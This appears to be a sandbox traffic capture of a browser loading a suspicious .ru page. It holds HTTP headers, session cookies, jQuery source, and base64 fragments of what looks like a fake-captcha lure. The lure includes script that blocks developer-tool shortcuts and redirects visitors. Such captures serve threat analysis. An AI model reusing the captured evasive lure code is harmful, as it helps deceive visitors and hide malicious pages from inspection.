                                                    2025-01-15 03:46:06 UTC1369INData Raw: 63 38 37 0d 0a 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 6a 63 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 63 30 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58
                                                    Data Ascii: c87a2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZX
                                                    2025-01-15 03:46:06 UTC1369INData Raw: 62 32 64 73 5a 53 35 6a 62 32 30 76 4a 79 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 42 39 4c 43 41 78 4d 44 41 70 4f 77 30 4b 66 53 6b 6f 4b 54 73 4e 43 6a 77 76 63 32 4e 79 61 58 42 30 50 67 30 4b 50 43 39 6f 5a 57 46 6b 50 67 30 4b 50 47 4a 76 5a 48 6b 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 6e 52 68 61 57 35 6c 63 69 49 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 49 6a 34 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6d 4e 76 62 6e 52 68 61 57 35 6c 63 69 49 2b 44 51 6f 67 49 43 41 67 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 59 32 46 77 64 47 4e 6f 59 53 31
                                                    Data Ascii: b2dsZS5jb20vJyk7DQogICAgICAgIH0NCiAgICB9LCAxMDApOw0KfSkoKTsNCjwvc2NyaXB0Pg0KPC9oZWFkPg0KPGJvZHk+DQo8ZGl2IGNsYXNzPSJiYWNrZ3JvdW5kLWNvbnRhaW5lciI+DQo8ZGl2IGNsYXNzPSJiYWNrZ3JvdW5kIj48L2Rpdj4NCjxkaXYgY2xhc3M9ImNvbnRhaW5lciI+DQogICAgPGRpdiBjbGFzcz0iY2FwdGNoYS1
                                                    2025-01-15 03:46:06 UTC476INData Raw: 33 52 44 54 6d 56 77 52 45 35 6c 5a 45 6c 4e 54 56 46 71 53 43 74 77 52 45 35 6c 61 45 4e 4f 4b 7a 46 45 54 6d 56 30 52 45 35 4e 54 57 74 4a 54 56 46 70 53 56 42 70 4e 30 4a 6a 54 57 6c 49 64 6d 30 33 51 6b 39 6f 51 30 35 50 63 45 4e 4f 5a 58 42 44 54 6b 39 6f 52 55 35 50 5a 45 46 50 54 32 78 44 54 6d 55 35 51 55 31 50 63 45 52 4e 4b 32 68 45 54 6d 51 35 51 56 46 46 52 30 59 35 52 55 74 47 4f 55 52 50 62 31 55 77 53 30 55 34 65 6c 4e 76 56 54 42 48 52 44 68 36 54 32 31 56 56 55 74 47 4f 47 70 50 63 46 55 77 51 30 45 33 65 6b 4e 75 56 55 56 48 52 6a 6c 45 55 33 42 56 61 30 74 45 4f 48 70 50 62 31 56 36 55 32 35 57 52 55 64 47 4f 55 56 44 53 44 64 36 54 32 39 56 4d 45 4e 47 4f 47 70 58 62 6c 56 72 52 30 59 35 52 46 4e 75 56 57 74 48 52 54 68 71 51 32 5a 56
                                                    Data Ascii: 3RDTmVwRE5lZElNTVFqSCtwRE5laENOKzFETmV0RE5NTWtJTVFpSVBpN0JjTWlIdm03Qk9oQ05PcENOZXBDTk9oRU5PZEFPT2xDTmU5QU1PcERNK2hETmQ5QVFFR0Y5RUtGOURPb1UwS0U4elNvVTBHRDh6T21VVUtGOGpPcFUwQ0E3ekNuVUVHRjlEU3BVa0tEOHpPb1V6U25WRUdGOUVDSDd6T29VMENGOGpXblVrR0Y5RFNuVWtHRThqQ2ZV


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449760151.101.130.1374438796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-15 03:46:07 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                    Host: code.jquery.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: script
                                                    Referer: https://sgd.trilivarnor.ru/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-01-15 03:46:07 UTC611INHTTP/1.1 200 OK
                                                    Connection: close
                                                    Content-Length: 89501
                                                    Server: nginx
                                                    Content-Type: application/javascript; charset=utf-8
                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                    ETag: "28feccc0-15d9d"
                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                    Access-Control-Allow-Origin: *
                                                    Cross-Origin-Resource-Policy: cross-origin
                                                    Via: 1.1 varnish, 1.1 varnish
                                                    Accept-Ranges: bytes
                                                    Age: 2397294
                                                    Date: Wed, 15 Jan 2025 03:46:07 GMT
                                                    X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890065-NYC
                                                    X-Cache: HIT, HIT
                                                    X-Cache-Hits: 55, 0
                                                    X-Timer: S1736912768.600969,VS0,VE1
                                                    Vary: Accept-Encoding
                                                    2025-01-15 03:46:07 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                    2025-01-15 03:46:07 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                    2025-01-15 03:46:07 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                    2025-01-15 03:46:07 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                    2025-01-15 03:46:07 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                    2025-01-15 03:46:07 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                    2025-01-15 03:46:07 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                    2025-01-15 03:46:07 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                    2025-01-15 03:46:07 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                    2025-01-15 03:46:07 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.449758104.21.18.224438796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-15 03:46:07 UTC1324OUTGET /favicon.ico HTTP/1.1
                                                    Host: sgd.trilivarnor.ru
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Referer: https://sgd.trilivarnor.ru/NiKU3ISg/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cookie: XSRF-TOKEN=eyJpdiI6InRCQTNLMWlndFdNall2QTRXWThOUEE9PSIsInZhbHVlIjoiSm9ybnVSZkw2SStNL1M1ZVU3bDJncW1HMjNMMmhEZ1ZOZ05xOEFldUxXWFBNOHJkY3JGY3cwWFFTZ09Ccm01K2cvTnU1cXVNSlUrRUk4YU9vcGtMQ3dVV24zZmNGZHVUaXdLRHFaK0lnVWpvL21rUjFaQ1FBbUVTNTg5ZFVKd0EiLCJtYWMiOiI4MTc2OTIxYWFkMTVhMDg0YWU1NWY4MjRjOTA1YjQwODczYjNhZWU1NzIwNzYwMjlmODg1N2NkYWY1ZDU1MGU3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IitlalVWMURzZXY5aXBaWG9XdWhjWmc9PSIsInZhbHVlIjoidlF3U1V4MitCNnFsTXlaZlNWLzlLUmc0Z3NmUzFKM1B0WkdTTW1OZ3pOTWdNQ2tOeWtkVW54TDlJak5lY0ZiY09oMjNzbWVHQlNpbnZuVTB6eFREeGhEanFyb3RSaEtIUHQ5Q2syVHhFMVpSV3lLOGg2eWk1bWRRWCtCa0s0cXQiLCJtYWMiOiI5MWM4MzZhYjY1NDg3ZjYyZjI4ZDZkZTY2ZTQyMjMwOWZiMDA1Y2M5MDQ1NTkzMDJiYTRmMDhmYmMwZGYwMTg4IiwidGFnIjoiIn0%3D
                                                    2025-01-15 03:46:08 UTC1059INHTTP/1.1 404 Not Found
                                                    Date: Wed, 15 Jan 2025 03:46:08 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=14400
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jmRf16zT58AexhnhmMyus9lvl3qZNKEHEVidBqmcgsGFug330Qi4deMIoU7t9JKIUQd7EqucoazHf4VrMLyQnB%2F4psuSGElWEs3s7S2J2TeaaaDUXrEyO7QEZILLsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Vary: Accept-Encoding
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=4873&min_rtt=4857&rtt_var=1387&sent=7&recv=10&lost=0&retrans=0&sent_bytes=4208&recv_bytes=3764&delivery_rate=586370&cwnd=253&unsent_bytes=0&cid=37ae0ebd5f61a425&ts=12431&x=0"
                                                    CF-Cache-Status: EXPIRED
                                                    Server: cloudflare
                                                    CF-RAY: 9022e07ff8af8236-IAD
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=7118&min_rtt=7112&rtt_var=2679&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1902&delivery_rate=407707&cwnd=32&unsent_bytes=0&cid=08c5ce2a4b0ed323&ts=2331&x=0"
                                                    2025-01-15 03:46:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449761151.101.66.1374438796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-15 03:46:08 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                    Host: code.jquery.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-01-15 03:46:08 UTC611INHTTP/1.1 200 OK
                                                    Connection: close
                                                    Content-Length: 89501
                                                    Server: nginx
                                                    Content-Type: application/javascript; charset=utf-8
                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                    ETag: "28feccc0-15d9d"
                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                    Access-Control-Allow-Origin: *
                                                    Cross-Origin-Resource-Policy: cross-origin
                                                    Via: 1.1 varnish, 1.1 varnish
                                                    Accept-Ranges: bytes
                                                    Date: Wed, 15 Jan 2025 03:46:08 GMT
                                                    Age: 2397295
                                                    X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890032-NYC
                                                    X-Cache: HIT, HIT
                                                    X-Cache-Hits: 55, 1
                                                    X-Timer: S1736912768.385632,VS0,VE1
                                                    Vary: Accept-Encoding
                                                    2025-01-15 03:46:08 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
